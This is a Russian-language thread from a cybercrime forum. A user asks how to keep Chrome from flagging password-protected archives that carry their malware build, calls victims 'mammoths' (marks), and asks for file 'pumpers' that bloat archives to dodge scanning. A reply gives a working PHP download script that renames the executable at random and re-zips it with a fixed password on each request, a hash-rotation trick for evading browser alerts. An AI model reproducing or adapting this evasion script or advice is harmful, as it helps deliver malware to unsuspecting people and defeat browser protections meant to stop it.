• XSS.stack #1 – первый литературный журнал от юзеров форума

Какой актуальный метод обхода Chrome Alert?

Отслеживать
Lunnayan

Lunnayan

(L3) cache
Пользователь
Регистрация
21.02.2023
Сообщения
225
Реакции
123
Говорю именно про Chrome Alert, который ругается на архивы с паролем


Если все же менять билд внутри архива + пасс, то спустя пару часов будет алерт
В основном использую простой пароль, сложные не вариант как по мне, мамонты тупые. По типу: sofware2024 download2121 и тд.

Можно конечно менять файлы внутри архива + сам билд, но все равно это не прям то что нужно, к тому же это по большей части запор и я хз как можно что-то подобное автоматизировать, ну желательно чтобы пароль не менялся в таких случаях


Какие сейчас +- актуальные методы имеются, которые бы хотя бы на часов 5-6 держалось без алерта
И какие есть актуальные памперы файлов, которые бы не просто файл пампили, а еще и сам архив по итогу вы весил 700+ мб, а то обычно сам файл пампится, а архив нет
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Код: 
<?php
function generateRandomString($length = 10) {
    return substr(str_shuffle('0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'), 0, $length);
}

function createZipWithPassword($filePath, $zipFilePath, $password) {
    $command = "zip -j -P $password $zipFilePath $filePath";
    exec($command, $output, $return_var);
    return $return_var === 0;
}

function getNewFileName($extension) {
    return generateRandomString() . '.' . $extension;
}

$originalFileName = 'setup.exe';
$newFileName = getNewFileName('exe');
$zipFileName = getNewFileName('zip');
$password = 'software2024'; // Фиксированный пароль

rename($originalFileName, $newFileName);

if (createZipWithPassword($newFileName, $zipFileName, $password)) {
    header('Content-Type: application/zip');
    header("Content-Disposition: attachment; filename=$zipFileName");
    readfile($zipFileName);
    
    // Clean up
    unlink($newFileName);
    unlink($zipFileName);
} else {
    echo "Error creating ZIP file.";
}
?>

Этот скрипт можно вызывать через URL, например: download.php?getfile1. Когда пользователь перейдет по этому адресу, он сможет скачать ZIP-архив с зашифрованным файлом setup.exe, используя пароль software2024
 
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх